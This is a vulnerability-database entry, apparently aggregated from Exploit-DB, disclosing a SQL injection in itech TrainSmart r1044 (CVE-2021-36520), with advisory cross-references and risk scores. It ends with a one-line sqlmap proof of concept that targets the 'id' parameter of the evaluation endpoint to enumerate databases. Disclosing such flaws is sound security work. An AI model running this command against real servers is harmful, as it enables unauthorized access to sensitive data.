itech TrainSmart r1044 - SQL injection

🗓️ 05 Apr 2023 00:00:00Reported by Adrian BondoceaType

exploitdb🔗 www.exploit-db.com👁 167 Views

itech TrainSmart r1044 - SQL injection, allows remote viewing of sensitive info via sqlmap

Reporter	Title	Published	Views	Family All 11
0day.today	itech TrainSmart r1044 - SQL injection Vulnerability	5 Apr 202300:00	–	zdt
Circl	CVE-2021-36520	16 Apr 202307:27	–	circl
CNNVD	I-TECH TrainSmart SQL注入漏洞	5 Apr 202300:00	–	cnnvd
CVE	CVE-2021-36520	16 Apr 202300:00	–	cve
Cvelist	CVE-2021-36520	16 Apr 202300:00	–	cvelist
EUVD	EUVD-2021-23122	7 Oct 202500:30	–	euvd
NVD	CVE-2021-36520	16 Apr 202304:15	–	nvd
Packet Storm	itech TrainSmart r1044 SQL Injection	6 Apr 202300:00	–	packetstorm
Prion	Sql injection	16 Apr 202304:15	–	prion
RedhatCVE	CVE-2021-36520	22 May 202519:58	–	redhatcve

# Exploit Title: itech TrainSmart r1044 - SQL injection
# Date: 03.02.2023
# Exploit Author: Adrian Bondocea
# Software Link: https://sourceforge.net/p/trainsmart/code/HEAD/tree/code/
# Version: TrainSmart r1044
# Tested on: Linux
# CVE : CVE-2021-36520

SQL injection vulnerability in itech TrainSmart r1044 allows remote
attackers to view sensitive information via crafted command using sqlmap.

PoC:
sqlmap --url 'http://{URL}//evaluation/assign-evaluation?id=1' -p id -dbs

05 Apr 2023 00:00Current

7.7High risk

Vulners AI Score7.7

CVSS 3.17.5

EPSS0.0094

SSVC